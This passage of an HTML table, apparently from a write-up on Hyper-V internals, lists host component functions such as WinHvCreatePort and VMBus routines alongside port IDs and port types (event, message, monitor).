</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="8" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmuidevices!VideoSynthDevice::PowerOn</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10005</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="9" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ActivationVDev!CSppActivationVDevT<CEmptyType>::PostReset</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10006</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="10" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmicvdev!ICVdevDevice::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10007</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="11" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmicrdv!ICRdvVdevDevice::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10008</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="12" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VmSynthNic!SynthNic::PowerOn</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10009</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="13" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmsynthstor!SynthStor::PowerOn</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1000a</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="14" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhvr!WinHvCreatePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartParentCreateNewMessa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChServerReserveChannelLoc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChmOpenReservedChannel</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">41</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeMessage</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="15" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhvr!WinHvCreatePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentCreateMonitors</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartChildConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChpChildConnectLocked</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChpNegotiateVersionLocked</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeMonitor</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="16" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhvr!WinHvCreatePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentCreateMonitors</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartChildConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChpChildConnectLocked</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChpNegotiateVersionLocked</span></div>
